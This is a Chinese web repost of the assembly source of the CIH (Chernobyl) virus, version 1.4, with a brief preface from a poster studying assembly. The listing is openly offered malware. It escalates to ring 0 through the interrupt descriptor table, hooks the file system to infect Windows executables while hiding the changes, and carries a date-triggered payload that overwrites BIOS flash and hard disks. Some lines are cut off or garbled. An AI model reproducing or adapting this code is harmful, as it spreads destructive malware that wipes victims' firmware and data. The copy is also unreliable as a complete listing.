
Source code of CIH

王朝other·作者佚名  2006-01-09
窄屏简体版  字體: |||超大  


;*最近一直在学习汇编 今天早上闲来无聊 从网上搜来了CIH源代码 *

;*大概浏览了一下 可惜水平有限 没怎么看懂 *

;*先发到这里吧 以后再慢慢研究 *


; ****************************************************************************

; * The Virus Program Information *

; ****************************************************************************

; * *

; * Designer : CIH Source : TTIT of TATUNG in Taiwan *

; * Create Date : 04/26/1998 Now Version : 1.4 *

; * Modification Time : 05/31/1998 *

; * *

; * Turbo Assembler Version 4.0 : tasm /m cih *

; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe *

; * *

; *==========================================================================*

; * Modification History *

; *==========================================================================*

; * v1.0 1. Create the Virus Program. *

; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *

; * 04/26/1998 3. Virus Code doesn't Reload into System. *

; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *

; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *

; * 6. When System Opens Existing PE File, the File will be *

; * Infected, and the File doesn't be Reinfected. *

; * 7. It is also Infected, even the File is Read-Only. *

; * 8. When the File is Infected, the Modification Date and Time *

; * of the File also don't be Changed. *

; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *

; * Previous FileSystemApiHook, it will Call the Function *

; * that the IFS Manager Would Normally Call to Implement *

; * this Particular I/O Request. *

; * 10. The Virus Size is only 656 Bytes. *

; *==========================================================================*

; * v1.1 1. Especially, the File that be Infected will not Increase *

; * it's Size... ^__^ *

; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *

; * When Exception Error Occurs, Our OS System should be in *

; * Windows NT. So My Cute Virus will not Continue to Run, *

; * it will Jmup to Original Application to Run. *

; * 3. Use Better Algorithm, Reduce Virus Code Size. *

; * 4. The Virus "Basic" Size is only 796 Bytes. *

; *==========================================================================*

; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *

; * 2. Modify the Bug of v1.1 *

; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *

; *==========================================================================*

; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *

; * So When Open WinZip Self-Extractor ==> Don't Infect it. *

; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *

; *==========================================================================*

; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *

; * 2. Change the Date of Killing Computers. *

; * 05/31/1998 3. Modify Virus Version Copyright. *

; * 4. The Virus "Basic" Size is 1019 Bytes. *

; ****************************************************************************


; ****************************************************************************

; * Original PE Executable File(Don't Modify this Section) *

; ****************************************************************************



db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h

db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h

db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h

db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh

db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h

db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h

db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh

db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh

db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h

db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah

db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h

db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h

db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h

db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h

db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h

db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h

db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h

db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h

db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h

db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

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db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h

dd 00000000h, VirusSize

lea ecx, StopToRunVirusCode-@0[ebx]

push ecx

push eax

; *************************************

; * Let's Modify *

; * IDT(Interrupt Descriptor Table) *

; * to Get Ring0 Privilege... *

; *************************************

push eax ;

sidt [esp-02h] ; Get IDT Base Address

pop ebx ;

add ebx, HookExceptionNumber*08h+04h ; ZF = 0


mov ebp, [ebx] ; Get Exception Base

mov bp, [ebx-04h] ; Entry Point

lea esi, MyExceptionHook-@1[ecx]

push esi

mov [ebx-04h], si ;

shr esi, 16 ; Modify Exception

mov [ebx+02h], si ; Entry Point Address

pop esi

; *************************************

; * Generate Exception to Get Ring0 *

; *************************************

int HookExceptionNumber ; GenerateException

ReturnAddressOfEndException = $

; *************************************

; * Merge All Virus Code Section *

; *************************************

; *************************************

; * Generate Exception Again *

; *************************************

int HookExceptionNumber ; GenerateException Aga

; *************************************

; * Let's Restore *

; * Structured Exception Handing *

; *************************************



xor ebx, ebx

jmp RestoreSE

; *************************************

; * When Exception Error Occurs, *

; * Our OS System should be in NT. *

; * So My Cute Virus will not *

; * Continue to Run, it Jmups to *

; * Original Application to Run. *

; *************************************


@1 = StopToRunVirusCode

xor ebx, ebx

mov eax, fs:[ebx]

mov esp, [eax]


pop dword ptr fs:[ebx]

pop eax

; *************************************

; * Return Original App to Execute *

; *************************************

pop ebp

push 00401000h ; Push Original

OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack

ret ; Return to Original App Entry Point

; *********************************************************

; * Ring0 Virus Game Initial Program *

; *********************************************************


@2 = MyExceptionHook

jz InstallMyFileSystemApiHook

; *************************************

; * Do My Virus Exist in System !? *

; *************************************

mov ecx, dr0

jecxz AllocateSystemMemoryPage

add dword ptr [esp], ReadyRestoreSE-ReturnAddressOf


; *************************************

; * Return to Ring3 Initial Program *

; *************************************


mov [ebx-04h], bp ;

shr ebp, 16 ; Restore Exception

mov [ebx+02h], bp ;


; *************************************

; * Allocate SystemMemory Page to Use *

; *************************************


mov dr0, ebx ; Set the Mark of My Virus Exis

in System

push 00000000fh ;

push ecx ;

push 0ffffffffh ;

push ecx ;

push ecx ;

push ecx ;

push 000000001h ;

push 000000002h ;

int 20h ; VMMCALL _PageAllocate

_PageAllocate = $ ;

dd 00010053h ; Use EAX, ECX, EDX, and flags

add esp, 08h*04h

xchg edi, eax ; EDI = SystemMemory Start Addr


lea eax, MyVirusStart-@2[esi]

iretd ; Return to Ring3 Initial Program

; *************************************

; * Install My File System Api Hook *

; *************************************


lea eax, FileSystemApiHook-@6[edi]

push eax ;

int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook

IFSMgr_InstallFileSystemApiHook = $ ;

dd 00400067h ; Use EAX, ECX, EDX, and flags

mov dr0, eax ; Save OldFileSystemApiHook Add


pop eax ; EAX = FileSystemApiHook Address

; Save Old IFSMgr_InstallFileSystemApiHook Entry Point

mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]

mov edx, [ecx]

mov OldInstallFileSystemApiHook-@3[eax], edx

; Modify IFSMgr_InstallFileSystemApiHook Entry Point

lea eax, InstallFileSystemApiHook-@3[eax]

mov [ecx], eax


jmp ExitRing0Init

; *********************************************************

; * Code Size of Merge Virus Code Section *

; *********************************************************

CodeSizeOfMergeVirusCodeSection = offset $

; *********************************************************

; * IFSMgr_InstallFileSystemApiHook *

; *********************************************************


push ebx

call @4 ;

@4: ;

pop ebx ; mov ebx, offset FileSystemApiHook

add ebx, FileSystemApiHook-@4 ;

push ebx

int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook

IFSMgr_RemoveFileSystemApiHook = $

dd 00400068h ; Use EAX, ECX, EDX, and flags

pop eax

; Call Original IFSMgr_InstallFileSystemApiHook

; to Link Client FileSystemApiHook

push dword ptr [esp+8]

call OldInstallFileSystemApiHook-@3[ebx]

pop ecx

push eax

; Call Original IFSMgr_InstallFileSystemApiHook

; to Link My FileSystemApiHook

push ebx

call OldInstallFileSystemApiHook-@3[ebx]

pop ecx

mov dr0, eax ; Adjust OldFileSystemApiHook A


pop eax

pop ebx


; *********************************************************

; * Static Data *

; *********************************************************

OldInstallFileSystemApiHook dd ?

; *********************************************************

; * IFSMgr_FileSystemHook *

; *********************************************************

; *************************************

; * IFSMgr_FileSystemHook Entry Point *

; *************************************


@3 = FileSystemApiHook


call @5 ;

@5: ;

pop esi ; mov esi, offset VirusGameDataStartAdd


add esi, VirusGameDataStartAddress-@5

; *************************************

; * Is OnBusy !? *

; *************************************

test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy )

jnz pIFSFunc ; goto pIFSFunc

; *************************************

; * Is OpenFile !? *

; *************************************

; if ( NotOpenFile )

; goto prevhook

lea ebx, [esp+20h+04h+04h]

cmp dword ptr [ebx], 00000024h

jne prevhook

; *************************************

; * Enable OnBusy *

; *************************************

inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy

; *************************************

; * Get FilePath's DriveNumber, *

; * then Set the DriveName to *

; * FileNameBuffer. *

; *************************************

; * Ex. If DriveNumber is 03h, *

; * DriveName is 'C:'. *

; *************************************

; mov esi, offset FileNameBuffer

add esi, FileNameBuffer-@6

push esi

mov al, [ebx+04h]

cmp al, 0ffh

je CallUniToBCSPath

add al, 40h

mov ah, ':'

mov [esi], eax

inc esi

inc esi

; *************************************

; * UniToBCSPath *

; *************************************

; * This Service Converts *

; * a Canonicalized Unicode Pathname *

; * to a Normal Pathname in the *

; * Specified BCS Character Set. *

; *************************************


push 00000000h

push FileNameBufferSize

mov ebx, [ebx+10h]

mov eax, [ebx+0ch]

add eax, 04h

push eax

push esi

int 20h ; VXDCall UniToBCSPath

UniToBCSPath = $

dd 00400041h

add esp, 04h*04h

; *************************************

; * Is FileName '.EXE' !? *

; *************************************

; cmp [esi+eax-04h], '.EXE'

cmp [esi+eax-04h], 'EXE.'

pop esi

jne DisableOnBusy


; *************************************

; * Only for Debug *

; *************************************

; cmp [esi+eax-06h], 'FUCK'

cmp [esi+eax-06h], 'KCUF'

jne DisableOnBusy


; *************************************

; * Is Open Existing File !? *

; *************************************

; if ( NotOpenExistingFile )

; goto DisableOnBusy

cmp word ptr [ebx+18h], 01h

jne DisableOnBusy

; *************************************

; * Get Attributes of the File *

; *************************************

mov ax, 4300h

int 20h ; VXDCall IFSMgr_Ring0_FileIO

IFSMgr_Ring0_FileIO = $

dd 00400032h

jc DisableOnBusy

push ecx

; *************************************

; * Get IFSMgr_Ring0_FileIO Address *

; *************************************

mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]

mov edi, [edi]

; *************************************

; * Is Read-Only File !? *

; *************************************

test cl, 01h

jz OpenFile

; *************************************

; * Modify Read-Only File to Write *

; *************************************

mov ax, 4301h

xor ecx, ecx

call edi ; VXDCall IFSMgr_Ring0_FileIO

; *************************************

; * Open File *

; *************************************


xor eax, eax

mov ah, 0d5h

xor ecx, ecx

xor edx, edx

inc edx

mov ebx, edx

inc ebx

call edi ; VXDCall IFSMgr_Ring0_FileIO

xchg ebx, eax ; mov ebx, FileHandle

; *************************************

; * Need to Restore *

; * Attributes of the File !? *

; *************************************

pop ecx


test cl, 01h

jz IsOpenFileOK

; *************************************

; * Restore Attributes of the File *

; *************************************

mov ax, 4301h

call edi ; VXDCall IFSMgr_Ring0_FileIO

; *************************************

; * Is Open File OK !? *

; *************************************



jc DisableOnBusy

; *************************************

; * Open File Already Succeed. ^__^ *

; *************************************

push esi ; Push FileNameBuffer Address to Stack

pushf ; Now CF = 0, Push Flag to Stack

add esi, DataBuffer-@7 ; mov esi, offset DataBuffer

; ***************************

; * Get OffsetToNewHeader *

; ***************************

xor eax, eax

mov ah, 0d6h

; For Doing Minimal VirusCode's Length,

; I Save EAX to EBP.

mov ebp, eax

push 00000004h

pop ecx

push 0000003ch

pop edx

call edi ; VXDCall IFSMgr_Ring0_FileIO

; * EDX = 'PE\0\0' Signature of *

; * ImageFileHeader Pointer's *

; * Former Byte. *

; * ESI = DataBuffer Address ==> @8 *

; * EDI = IFSMgr_Ring0_FileIO Address *

; * EBP = D600h ==> Read Data in File *

; *************************************

; * Stack Dump : *

; * *

; * ESP => ------------------------- *

; * | EFLAG(CF=0) | *

; * ------------------------- *

; * | FileNameBufferPointer | *

; * ------------------------- *

; * | EDI | *

; * ------------------------- *

; * | ESI | *

; * ------------------------- *

; * | EBP | *

; * ------------------------- *

; * | ESP | *

; * ------------------------- *

; * | EBX | *

; * ------------------------- *

; * | EDX | *

; * ------------------------- *

; * | ECX | *

; * ------------------------- *

; * | EAX | *

; * ------------------------- *

; * | Return Address | *

; * ------------------------- *

; *************************************

push ebx ; Save File Handle

push 00h ; Set VirusCodeSectionTableEndMark

; ***************************

; * Let's Set the *

; * Virus' Infected Mark *

; ***************************

push 01h ; Size

push edx ; Pointer of File

push edi ; Address of Buffer

; ***************************

; * Save ESP Register *

; ***************************

mov dr1, esp

; ***************************

; * Let's Set the *

; * NewAddressOfEntryPoint *

; * ( Only First Set Size ) *

; ***************************

push eax ; Size

; ***************************

; * Let's Read *

; * Image Header in File *

; ***************************

mov eax, ebp

mov cl, SizeOfImageHeaderToRead

add edx, 07h ; Move EDX to NumberOfSections

call edi ; VXDCall IFSMgr_Ring0_FileIO

; ***************************

; * Let's Set the *

; * NewAddressOfEntryPoint *

; * ( Set Pointer of File, *

; * Address of Buffer ) *

; ***************************

lea eax, (AddressOfEntryPoint-@8)[edx]

push eax ; Pointer of File

lea eax, (NewAddressOfEntryPoint-@8)[esi]

push eax ; Address of Buffer

; ***************************

; * Move EDX to the Start *

; * of SectionTable in File *

; ***************************

movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]

lea edx, [eax+edx+12h]

; ***************************

; * Let's Get *

; * Total Size of Sections *

; ***************************

mov al, SizeOfScetionTable

; I Assume NumberOfSections <= 0ffh

mov cl, (NumberOfSections-@8)[esi]

mul cl

; ***************************

; * Let's Set Section Table *

; ***************************

; Move ESI to the Start of SectionTable

lea esi, (StartOfSectionTable-@8)[esi]

push eax ; Size

push edx ; Pointer of File

push esi ; Address of Buffer

; ***************************

; * The Code Size of Merge *

; * Virus Code Section and *

; * Total Size of Virus *

; * Code Section Table Must *

; * be Small or Equal the *

; * Unused Space Size of *

; * Following Section Table *

; ***************************

inc ecx

push ecx ; Save NumberOfSections+1

shl ecx, 03h

push ecx ; Save TotalSizeOfVirusCodeSectionTable

add ecx, eax

add ecx, edx

sub ecx, (SizeOfHeaders-@9)[esi]

not ecx

inc ecx

; Save My Virus First Section Code

; Size of Following Section Table...

; ( Not Include the Size of Virus Code Section Table )

push ecx

xchg ecx, eax ; ECX = Size of Section Table

; Save Original Address of Entry Point

mov eax, (AddressOfEntryPoint-@9)[esi]

add eax, (ImageBase-@9)[esi]

mov (OriginalAddressOfEntryPoint-@9)[esi], eax

cmp word ptr [esp], small CodeSizeOfMergeVirusCodeS


jl OnlySetInfectedMark

; ***************************

; * Read All Section Tables *

; ***************************

mov eax, ebp

call edi ; VXDCall IFSMgr_Ring0_FileIO

; ***************************

; * Full Modify the Bug : *

; * WinZip Self-Extractor *

; * Occurs Error... *

; ***************************

; * So When User Opens *

; * WinZip Self-Extractor, *

; * Virus Doesn't Infect it.*

; ***************************

; * First, Virus Gets the *

; * PointerToRawData in the *

; * Second Section Table, *

; * Reads the Section Data, *

; * and Tests the String of *

; * 'WinZip(R)'...... *

; ***************************

xchg eax, ebp

push 00000004h

pop ecx

push edx

mov edx, (SizeOfScetionTable+PointerToRawData-@9)[e


add edx, 12h

call edi ; VXDCall IFSMgr_Ring0_FileIO

; cmp [esi], 'nZip'

cmp dword ptr [esi], 'piZn'

je NotSetInfectedMark

pop edx

; ***************************

; * Let's Set Total Virus *

; * Code Section Table *

; ***************************

; EBX = My Virus First Section Code

; Size of Following Section Table

pop ebx

pop edi ; EDI = TotalSizeOfVirusCodeSectionTabl

pop ecx ; ECX = NumberOfSections+1

push edi ; Size

add edx, ebp

push edx ; Pointer of File

add ebp, esi

push ebp ; Address of Buffer

; ***************************

; * Set the First Virus *

; * Code Section Size in *

; * VirusCodeSectionTable *

; ***************************

lea eax, [ebp+edi-04h]

mov [eax], ebx

; ***************************

; * Let's Set My Virus *

; * First Section Code *

; ***************************

push ebx ; Size

add edx, edi

push edx ; Pointer of File

lea edi, (MyVirusStart-@9)[esi]

push edi ; Address of Buffer

; ***************************

; * Let's Modify the *

; * AddressOfEntryPoint to *

; * My Virus Entry Point *

; ***************************

mov (NewAddressOfEntryPoint-@9)[esi], edx

; ***************************

; * Setup Initial Data *

; ***************************

lea edx, [esi-SizeOfScetionTable]

mov ebp, offset VirusSize

jmp StartToWriteCodeToSections

; ***************************

; * Write Code to Sections *

; ***************************


add edx, SizeOfScetionTable

mov ebx, (SizeOfRawData-@9)[edx]

sub ebx, (VirtualSize-@9)[edx]

jbe EndOfWriteCodeToSections

push ebx ; Size

sub eax, 08h

mov [eax], ebx

mov ebx, (PointerToRawData-@9)[edx]

add ebx, (VirtualSize-@9)[edx]

push ebx ; Pointer of File

push edi ; Address of Buffer

mov ebx, (VirtualSize-@9)[edx]

add ebx, (VirtualAddress-@9)[edx]

add ebx, (ImageBase-@9)[esi]

mov [eax+4], ebx

mov ebx, [eax]

add (VirtualSize-@9)[edx], ebx

; Section contains initialized data ==> 00000040h

; Section can be Read. ==> 40000000h

or (Characteristics-@9)[edx], 40000040h


sub ebp, ebx

jbe SetVirusCodeSectionTableEndMark

add edi, ebx ; Move Address of Buffer


loop LoopOfWriteCodeToSections

; ***************************

; * Only Set Infected Mark *

; ***************************


mov esp, dr1

jmp WriteVirusCodeToFile

; ***************************

; * Not Set Infected Mark *

; ***************************


add esp, 3ch

jmp CloseFile

; ***************************

; * Set Virus Code *

; * Section Table End Mark *

; ***************************


; Adjust Size of Virus Section Code to Correct Value

add [eax], ebp

add [esp+08h], ebp

; Set End Mark

xor ebx, ebx

mov [eax-04h], ebx

; ***************************

; * When VirusGame Calls *

; * VxDCall, VMM Modifies *

; * the 'int 20h' and the *

; * 'Service Identifier' *

; * to 'Call [XXXXXXXX]'. *

; ***************************

; * Before Writing My Virus *

; * to File, I Must Restore *

; * them First. ^__^ *

; ***************************

lea eax, (LastVxDCallAddress-2-@9)[esi]

mov cl, VxDCallTableSize


mov word ptr [eax], 20cdh

mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]

mov [eax+2], edx

movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[es

sub eax, edx

loop LoopOfRestoreVxDCallID

; ***************************

; * Let's Write *

; * Virus Code to the File *

; ***************************


mov eax, dr1

mov ebx, [eax+10h]

mov edi, [eax]


pop ecx

jecxz SetFileModificationMark

mov esi, ecx

mov eax, 0d601h

pop edx

pop ecx

call edi ; VXDCall IFSMgr_Ring0_FileIO

jmp LoopOfWriteVirusCodeToFile

; ***************************

; * Let's Set CF = 1 ==> *

; * Need to Restore File *

; * Modification Time *

; ***************************


pop ebx

pop eax

stc ; Enable CF(Carry Flag)


; *************************************

; * Close File *

; *************************************


xor eax, eax

mov ah, 0d7h

call edi ; VXDCall IFSMgr_Ring0_FileIO

; *************************************

; * Need to Restore File Modification *

; * Time !? *

; *************************************


pop esi

jnc IsKillComputer

; *************************************

; * Restore File Modification Time *

; *************************************

mov ebx, edi

mov ax, 4303h

mov ecx, (FileModificationTime-@7)[esi]

mov edi, (FileModificationTime+2-@7)[esi]

call ebx ; VXDCall IFSMgr_Ring0_FileIO

; *************************************

; * Disable OnBusy *

; *************************************


dec byte ptr (OnBusy-@7)[esi] ; Disable OnBus

; *************************************

; * Call Previous FileSystemApiHook *

; *************************************





; *************************************

; * Kill Computer !? ... *^_^* *

; *************************************


; Get Now Day from BIOS CMOS

mov al, 07h

out 70h, al

in al, 71h

xor al, 26h ; ??/26/????


jmp DisableOnBusy


jnz DisableOnBusy


; **************************************

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; * Kill Kill Kill Kill Kill Kill Kill *

; **************************************

; ***************************

; * Kill BIOS EEPROM *

; ***************************

mov bp, 0cf8h

lea esi, IOForEEPROM-@7[esi]

; ***********************

; * Show BIOS Page in *

; * 000E0000 - 000EFFFF *

; * ( 64 KB ) *

; ***********************

mov edi, 8000384ch

mov dx, 0cfeh


call esi

; ***********************

; * Show BIOS Page in *

; * 000F0000 - 000FFFFF *

; * ( 64 KB ) *

; ***********************

mov di, 0058h

dec edx ; and a


mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h

call esi

; ***********************

; * Show the BIOS Extra *

; * ROM Data in Memory *

; * 000E0000 - 000E01FF *

; * ( 512 Bytes ) *

; * , and the Section *

; * of Extra BIOS can *

; * be Writted... *

; ***********************

lea ebx, EnableEEPROMToWrite-@10[esi]

mov eax, 0e5555h

mov ecx, 0e2aaah

call ebx

mov byte ptr [eax], 60h

push ecx

loop $

; ***********************

; * Kill the BIOS Extra *

; * ROM Data in Memory *

; * 000E0000 - 000E007F *

; * ( 80h Bytes ) *

; ***********************

xor ah, ah

mov [eax], al

xchg ecx, eax

loop $

; ***********************

; * Show and Enable the *

; * BIOS Main ROM Data *

; * 000E0000 - 000FFFFF *

; * ( 128 KB ) *

; * can be Writted... *

; ***********************

mov eax, 0f5555h

pop ecx

mov ch, 0aah

call ebx

mov byte ptr [eax], 20h

loop $

; ***********************

; * Kill the BIOS Main *

; * ROM Data in Memory *

; * 000FE000 - 000FE07F *

; * ( 80h Bytes ) *

; ***********************

mov ah, 0e0h

mov [eax], al

; ***********************

; * Hide BIOS Page in *

; * 000F0000 - 000FFFFF *

; * ( 64 KB ) *

; ***********************

; or al


mov word ptr (BooleanCalculateCode-@10)[esi], 100ch

call esi

; ***************************

; * Kill All HardDisk *

; ***************************************************

; * IOR Structure of IOS_SendCommand Needs *

; ***************************************************

; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *

; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *

; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *

; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *

; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *

; ***************************************************


xor ebx, ebx

mov bh, FirstKillHardDiskNumber

push ebx

sub esp, 2ch

push 0c0001000h

mov bh, 08h

push ebx

push ecx

push ecx

push ecx

push 40000501h

inc ecx

push ecx

push ecx

mov esi, esp

sub esp, 0ach


int 20h

mov [ecx], al

mov byte ptr [eax], 80h

mov [eax], cl

mov [ecx], al


; ***************************

; * IO for EEPROM *

; ***************************



xchg eax, edi

xchg edx, ebp

out dx, eax

xchg eax, edi

xchg edx, ebp

in al, dx

BooleanCalculateCode = $

or al, 44h

xchg eax, edi

xchg edx, ebp

out dx, eax

xchg eax, edi

xchg edx, ebp

out dx, al


; *********************************************************

; * Static Data *

; *********************************************************

LastVxDCallAddress = IFSMgr_Ring0_FileIO

VxDCallAddressTable db 00h

db IFSMgr_RemoveFileSystemApiHook-_PageAllocate

db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook

db IFSMgr_Ring0_FileIO-UniToBCSPath

VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h

VxDCallTableSize = ($-VxDCallIDTable)/04h

; *********************************************************

; * Virus Version Copyright *

; *********************************************************

VirusVersionCopyright db 'CIH v'

db MajorVirusVersion+'0'

db '.'

db MinorVirusVersion+'0'

db ' TATUNG'

; *********************************************************

; * Virus Size *

; *********************************************************

VirusSize = $

; + SizeOfVirusCodeSectionTableEndMark(04h)

; + NumberOfSections(??)*SizeOfVirusCodeSectionTa


; + SizeOfTheFirstVirusCodeSectionTable(04h)

; *********************************************************

; * Dynamic Data *

; *********************************************************

VirusGameDataStartAddress = VirusSize

@6 = VirusGameDataStartAddress

OnBusy db 0

FileModificationTime dd ?

FileNameBuffer db FileNameBufferSize dup(?)

@7 = FileNameBuffer

DataBuffer = $

@8 = DataBuffer

NumberOfSections dw ?

TimeDateStamp dd ?

SymbolsPointer dd ?

NumberOfSymbols dd ?

SizeOfOptionalHeader dw ?

_Characteristics dw ?

Magic dw ?

LinkerVersion dw ?

SizeOfCode dd ?

SizeOfInitializedData dd ?

SizeOfUninitializedData dd ?

AddressOfEntryPoint dd ?

BaseOfCode dd ?

BaseOfData dd ?

ImageBase dd ?

@9 = $

SectionAlignment dd ?

FileAlignment dd ?

OperatingSystemVersion dd ?

ImageVersion dd ?

SubsystemVersion dd ?

Reserved dd ?

SizeOfImage dd ?

SizeOfHeaders dd ?

SizeOfImageHeaderToRead = $-NumberOfSections

NewAddressOfEntryPoint = DataBuffer ; DWORD

SizeOfImageHeaderToWrite = 04h

StartOfSectionTable = @9

SectionName = StartOfSectionTable ; QWORD

VirtualSize = StartOfSectionTable+08h ; DWORD

VirtualAddress = StartOfSectionTable+0ch ; DWORD

SizeOfRawData = StartOfSectionTable+10h ; DWORD

PointerToRawData = StartOfSectionTable+14h ; DWORD

PointerToRelocations = StartOfSectionTable+18h ; DWORD

PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD

NumberOfRelocations = StartOfSectionTable+20h ; WORD

NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD

Characteristics = StartOfSectionTable+24h ; DWORD

SizeOfScetionTable = Characteristics+04h-SectionName

; *********************************************************

; * Virus Total Need Memory *

; *********************************************************

VirusNeedBaseMemory = $

VirusTotalNeedMemory = @9

; + NumberOfSections(??)*SizeOfScetionTable(28h)

 百态   2023-10-24
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 干货   2019-11-12
 干货   2019-11-12
 干货   2019-11-12
 干货   2019-11-12
 干货   2019-11-12
 干货   2019-11-12
 干货   2019-11-12
 干货   2019-11-12
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